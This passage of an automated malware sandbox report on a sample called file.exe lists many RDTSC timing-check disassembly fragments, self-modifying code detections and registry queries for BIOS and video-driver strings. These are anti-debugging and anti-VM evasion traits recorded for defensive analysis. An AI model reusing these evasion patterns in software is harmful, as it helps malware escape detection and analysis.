                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4F08C second address: D4F097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D505D0 second address: D505D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44A4C second address: D44A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44A52 second address: D44A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44D91 second address: D44E16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 mov di, 4C40h 0x0000000c lea eax, dword ptr [ebp+124859F8h] 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FDA252A1688h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c sub cx, 8554h 0x00000031 push eax 0x00000032 ja 00007FDA252A169Ah 0x00000038 jmp 00007FDA252A1694h 0x0000003d mov dword ptr [esp], eax 0x00000040 jmp 00007FDA252A168Ah 0x00000045 lea eax, dword ptr [ebp+124859B4h] 0x0000004b xor dx, 49E6h 0x00000050 add dword ptr [ebp+122D1C27h], edi 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007FDA252A1695h 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44E16 second address: D2F109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D376h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FDA2529D368h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 call dword ptr [ebp+122D1BF9h] 0x0000002c pushad 0x0000002d pushad 0x0000002e jmp 00007FDA2529D372h 0x00000033 jc 00007FDA2529D366h 0x00000039 push esi 0x0000003a pop esi 0x0000003b popad 0x0000003c js 00007FDA2529D368h 0x00000042 push ebx 0x00000043 pop ebx 0x00000044 push ebx 0x00000045 jmp 00007FDA2529D375h 0x0000004a pop ebx 0x0000004b push edi 0x0000004c pushad 0x0000004d popad 0x0000004e pop edi 0x0000004f popad 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FDA2529D36Eh 0x00000057 je 00007FDA2529D36Ch 0x0000005d jne 00007FDA2529D366h 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A33D second address: D8A372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FDA252A1686h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FDA252A1691h 0x00000013 pushad 0x00000014 popad 0x00000015 jng 00007FDA252A1686h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push ebx 0x0000001f pushad 0x00000020 popad 0x00000021 pop ebx 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A372 second address: D8A376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A376 second address: D8A38D instructions: 0x00000000 rdtsc 0x00000002 je 00007FDA252A1686h 0x00000008 jmp 00007FDA252A168Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A38D second address: D8A395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A395 second address: D8A399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A399 second address: D8A3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FDA2529D366h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A3A9 second address: D8A3AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A687 second address: D8A68B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A7F4 second address: D8A807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA252A168Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A807 second address: D8A80D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A80D second address: D8A817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FDA252A1686h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A988 second address: D8A9BF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jg 00007FDA2529D366h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jnc 00007FDA2529D379h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FDA2529D36Eh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A9BF second address: D8A9CE instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDA252A1686h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A9CE second address: D8A9D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A9D8 second address: D8A9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FDA252A1695h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AB30 second address: D8AB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007FDA2529D373h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFB43B second address: CFB451 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A168Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FDA252A1688h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFB451 second address: CFB45A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F674 second address: D8F683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FDA252A1686h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F683 second address: D8F68D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDA2529D366h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F68D second address: D8F69D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FDA252A1686h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F69D second address: D8F6AC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDA2529D366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8EF06 second address: D8EF23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDA252A1694h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F082 second address: D8F0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA2529D376h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F209 second address: D8F20D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91A46 second address: D91A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FDA2529D366h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d jns 00007FDA2529D36Ah 0x00000013 pushad 0x00000014 jmp 00007FDA2529D373h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91606 second address: D9160A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91771 second address: D917AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D36Fh 0x00000007 jmp 00007FDA2529D36Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 jmp 00007FDA2529D379h 0x00000016 pop ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D917AB second address: D917B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FDA252A1686h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96A16 second address: D96A1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96A1C second address: D96A23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96A23 second address: D96A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FDA2529D366h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96A34 second address: D96A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96769 second address: D96774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9ACEF second address: D9ACF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9AE75 second address: D9AE8F instructions: 0x00000000 rdtsc 0x00000002 je 00007FDA2529D36Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B166 second address: D9B18C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A1692h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FDA252A168Ch 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B2E4 second address: D9B2EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FDA2529D366h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0BC85 second address: D0BC8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA085D second address: DA0861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0861 second address: DA086F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FDA252A168Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0983 second address: DA099C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007FDA2529D372h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA099C second address: DA09B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA252A1691h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA09B1 second address: DA09B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA09B5 second address: DA09DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FDA252A168Fh 0x00000010 jmp 00007FDA252A168Ah 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0B26 second address: DA0B39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FDA2529D36Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0B39 second address: DA0B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA252A168Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7CF4 second address: DA7CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7ED6 second address: DA7EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDA252A1686h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7EE2 second address: DA7EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FDA2529D366h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8712 second address: DA8743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jnc 00007FDA252A1686h 0x0000000b jmp 00007FDA252A1698h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 jg 00007FDA252A1686h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8743 second address: DA8749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8749 second address: DA874E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8FD8 second address: DA8FDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8FDC second address: DA8FEB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDA252A1686h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA98CC second address: DA98D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA98D2 second address: DA98DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC9B5 second address: DAC9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC9B9 second address: DAC9CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A168Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC9CC second address: DAC9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC9D0 second address: DAC9D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACB2F second address: DACB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA2529D374h 0x00000009 jmp 00007FDA2529D372h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACB5E second address: DACB66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACF76 second address: DACF93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA2529D36Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDA2529D36Ah 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACF93 second address: DACF9F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007FDA252A1686h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAD23C second address: DAD268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push edi 0x0000000b ja 00007FDA2529D366h 0x00000011 pop edi 0x00000012 jmp 00007FDA2529D376h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAD268 second address: DAD272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FDA252A1686h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAD272 second address: DAD276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB407 second address: DBB418 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A168Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB965B second address: DB9660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB9660 second address: DB9666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB9666 second address: DB96A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D376h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDA2529D378h 0x00000012 jmp 00007FDA2529D36Dh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB9B0B second address: DB9B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB9DA0 second address: DB9DA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBA039 second address: DBA04F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDA252A168Ch 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBA04F second address: DBA067 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FDA2529D372h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB2A2 second address: DBB2C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A1692h 0x00000007 jmp 00007FDA252A168Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB91D8 second address: DB91DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB91DC second address: DB91FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FDA252A1697h 0x0000000c jmp 00007FDA252A1691h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB91FD second address: DB9203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB9203 second address: DB9207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE526 second address: DBE53C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FDA2529D366h 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c jo 00007FDA2529D382h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE53C second address: DBE540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFD1B second address: DBFD34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007FDA2529D36Eh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBFD34 second address: DBFD38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: B91A10 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: D39BB3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: DC8C97 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
